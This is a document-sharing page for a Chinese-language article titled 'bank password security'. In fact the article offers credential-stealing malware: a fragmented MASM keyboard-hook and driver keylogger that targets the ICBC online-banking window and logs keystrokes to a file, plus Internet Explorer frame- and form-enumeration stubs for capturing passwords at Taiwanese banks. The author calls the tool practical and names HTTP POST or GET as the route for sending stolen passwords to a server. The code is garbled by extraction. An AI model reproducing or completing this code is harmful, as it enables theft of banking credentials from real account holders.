银行密码安全文档格式.docx
- 文档编号:19018082
- 上传时间:2023-01-03
- 格式:DOCX
- 页数:12
- 大小:123.40KB
银行密码安全文档格式.docx
《银行密码安全文档格式.docx》由会员分享,可在线阅读,更多相关《银行密码安全文档格式.docx(12页珍藏版)》请在冰豆网上搜索。
我的朋友做了这方面的实验,针对中国工商银行新一代网上银行
这部分做了修改,确实非常有效果,实现了对新一代网银密码的抓取:
.data
g_hDevice
HANDLE
?
g_hEvent
g_hInstance
HINSTANCE?
g_hwndDlg
HWND
g_hwndListView
g_fExitNow
BOOL
g_fAlwaysOnTop
g_dwDlgWidth
DWORD
g_hPopupMenu
HMENU
CopyRight
db
"
CopyRight2006,"
Vist
中国工商银行新一代网上银行"
vist_flage
0
hBuffer
dd
hComputerName
db
32
dup(0)
hCurrentThreadPiDdd
hCurrentWindow
hDateFormat
yyyy:
MM:
dd"
0
;
ddMMMyyyy"
0
hDomaineName
128dup(0)
hFile
hHook
hmodul
MODULEENTRY32
<
>
hSnapShot
dd
hTimeFormat
hh:
mm:
sstt"
0
hUserName
msg
MSG
onlyOneCopy
Global\zkl"
0
Tempdb4096dup(0),0
IEPathdb"
:
\ProgramFiles\InternetExplorer\IEXPLORE.EXE"
0;
前面的空格用于放驱动器
URLdb"
http:
//localhost/name1.txt"
注意,有一个空格在网址前面
;
testdadadb"
sfd"
IEHandleHANDLE?
用于关闭IE页面
FileMemDWORD?
//文件内容
FileMemSizeDWORD0;
//文件长度
MyFileNamedb"
ZKeyLog.txt"
KeyBoardProc
PROCnCode:
DWORD,wParam:
DWORD,lParam:
LOCAL
lpKeyState[256]
BYTE
lpClassName[64]
lpCharBuf[32]
lpDateBuf[12]
lpTimeBuf[12]
lpLocalTime:
SYSTEMTIME
----------------------------
leaedi,[lpKeyState];
letszerooutourbuffers
push
256/4
pop
ecx
xoreax,eax
repstosd
setsusupfordoublewordfromEAX
mov
eax,wParam
cmp
eax,WM_KEYUP
onlyneedWM_KEYDOWN
je
next_hook
bypassdoublelogging
eax,WM_SYSKEYUP
onlyNeedWM_SYSKEYDOWN
bypassdoublelogging
invokeGetForegroundWindow
gethandleforcurrentlyusedwindow(specifictoNT)
[hCurrentWindow],eax
ifitsnotdifferenttolastonesaved..
no_window_change
bypassalltheheadings
saveitforusenowandcomparelater
invokeGetClassName,hCurrentWindow,ADDRlpClassName,64
invoke
GetLocalTime,ADDRlpLocalTime
invokeGetDateFormat,NULL,NULL,ADDRlpLocalTime,ADDRhDateFormat,ADDRlpDateBuf,12
invokeGetTimeFormat,NULL,NULL,ADDRlpLocalTime,ADDRhTimeFormat,ADDRlpTimeBuf,12
invokeGetWindowThreadProcessId,hCurrentWindow,ADDRhCurrentThreadPiD
CreateToolhelp32Snapshot,TH32CS_SNAPMODULE,hCurrentThreadPiD
mov
hSnapShot,eax
hmodul.dwSize,sizeofMODULEENTRY32
Module32First,hSnapShot,addrhmodul
CloseHandle,hSnapShot
invokeGetWindowText,hCurrentWindow,ADDRlpKeyState,256
********************
movecx,8
leaesi,[lpKeyState]
leaedi,[Vist]
cld
repecmpsw
jnznext_hook
movbyteptr[vist_flage],5ah
*********************
lea
esi,[hmodul.szExePath]
printthecurrentprogramexename
esi
lea
esi,[lpTimeBuf]
printtheformattedtime
esi,[lpDateBuf]
printtheformatteddate
pushz
13,10,13,10,"
[%s,%s-程序名:
%s]"
[hFile]
call
fprintf
writethebuffertocache
add
esp,3*4
leaesi,[lpClassName]
printthecurrentwindowclassname
leaesi,[lpKeyState];
printthecurrentwindowtitle
13,10,"
[窗口标题:
%s-窗口类:
13,10
invokefflush,hFile
next_hook:
movbyteptr[vist_flage],00h
invokeCallNextHookEx,hHook,nCode,wParam,lParam
ENDP
:
FillKeyInfo
FillKeyInfoprocusesesiebxpaKeyData:
PTRKEY_DATA,cb:
UINT
locallvi:
LV_ITEM
localbuffer[32]:
CHAR
movesi,paKeyData
assumeesi:
ptrKEY_DATA
moveax,cb
movlvi.imask,LVIF_TEXT
ListView_GetItemCountg_hwndListView
movlvi.iItem,eax
movedx,[esi].dwScanCode
shledx,16
moveax,[esi].Flags
andeax,KEY_E0
.ifeax!
=0
oredx,1SHL24
.endif
invokeGetKeyNameText,edx,addrbuffer,sizeofbuffer
KeyName
andeax,(KEY_MAKE+KEY_BREAK)
Iknowit'
sthesameasandingwithKEY_BREAK
.ifeax==KEY_BREAK
.ifbyteptr[vist_flage]==5ah
invokefprintf,hFile,addrbuffer
.endif
addesi,sizeofKEY_DATA
invoke
fflush,hFile
ListView_GetItemCountg_hwndListView
deceax
Makeindexzero-based
ListView_EnsureVisibleg_hwndListView,eax,FALSE
nothing
FillKeyInfoendp
WaitForKeyData
WaitForKeyDataprochEvent:
HANDLE
localpaKeyData:
PKEY_DATA
localcbKeyData:
localdwBytesReturned:
movcbKeyData,KEY_DATA*MAX_KEY_DATA_ENTRIES
invokemalloc,cbKeyData
=NULL
movpaKeyData,eax
.whileTRUE
invokeWaitForSingleObject,hEvent,INFINITE
=WAIT_FAILED
.break.ifg_fExitNow==TRUE
Waitforkeywillbereleased.
Otherwisewewillgetkeymake
andkeybreakinseparate"
GetKeyData"
request.
invokeSleep,100
invokeDeviceIoControl,g_hDevice,IOCTL_GET_KEY_DATA,NULL,0,\
paKeyData,cbKeyData,addrdwBytesReturned,NULL
.if(eax!
=0)&
&
(dwBytesReturned!
=0)
invokeFillKeyInfo,paKeyData,dwBytesReturned
Wewaitalittletonotaskdrivertoooften.
invokeSleep,900
.else
invokeMessageBox,g_hwndDlg,\
$CTA0("
Waitfailed.Threadnowexits.Restartapplication."
),NULL,MB_ICONERROR
.break
invokefree,paKeyData
invokeExitThread,0
ret
Neverexecuted.
WaitForKeyDataendp
2.IE框架代码的密码抓取
见下图,,实现台湾几大银行密码的抓取
DWORDWINAPIEnumIE(LPVOIDlpParam);
//枚举浏览器函数
voidEnumFrame(IHTMLDocument2*pIHTMLDocument2);
//枚举IE子框架函数
voidEnumForm(IHTMLDocument2*pIHTMLDocument2);
//枚举IE表单函数
这个程序已经实用化,当然要考虑抓密码的程序如何把密码发送到服务器,这里一般的办法不是通过邮件,而是通过HTTPPOST方法,或者是HTTPGET加参数的办法提交密码数据,我这里也就不多说了
总结一下:
有关网银大盗并不神秘,一般的抓密码的方法基本都不可取,现在基本就是驱动键盘钩子,还有就是IE表单的办法.
有希望交流的,可以发送邮件给我,x_database@
感谢:
非常感谢”教主”,我参见了”教主”的一些代码,他是这个安全行业里的牛人,非常感谢.
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 银行 密码 安全